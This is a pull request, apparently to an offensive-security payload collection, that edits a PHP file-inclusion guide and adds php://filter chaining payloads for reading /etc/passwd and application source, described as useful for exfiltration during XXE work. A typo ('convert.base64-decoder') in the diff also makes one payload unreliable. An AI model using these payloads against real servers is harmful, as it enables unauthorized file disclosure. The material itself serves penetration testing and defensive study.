### PR TITLE
Adding second method of chaining PHP filters

### DIFF
--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -133,7 +133,9 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
-NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+NOTE: Wrappers can be chained multiple times : 
+- Multiple base64 decodes: `php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=%s`
+- deflate then base64encode (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
 
 ```powershell
 ./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 

--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -133,8 +133,8 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
-NOTE: Wrappers can be chained multiple times : 
-- Multiple base64 decodes: `php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=%s`
+NOTE: Wrappers can be chained multiple times using `|` or `/`: 
+- Multiple base64 decodes: `php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s`
 - deflate then base64encode (useful for limited character exfil): `php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php`
 
 ```powershell


### PR DESCRIPTION
I originally thought that the `|` was a typo, and that it should be `/`. But from the PHP command line, both seem to work:
```
php > readfile('file');
testhttps://github.com/swisskyrepo/PayloadsAllTheThings/pulls
php > readfile('php://filter/convert.base64-encode/resource=file');
dGVzdAo=
php > readfile('php://filter/convert.base64-encode|convert.base64-encode/resource=file');
ZEdWemRBbz0=
php > readfile('php://filter/convert.base64-encode/convert.base64-encode/resource=file');
ZEdWemRBbz0=
php > readfile('php://filter/zlib.deflate/convert.base64-encode/resource=file');
K0ktLuECAA==
php > readfile('php://filter/zlib.deflate|convert.base64-encode/resource=file');
K0ktLuECAA==
```

However, in a recent OOB XXE I was doing, `/` worked, but `|` didn't. Adding in `/` for completeness.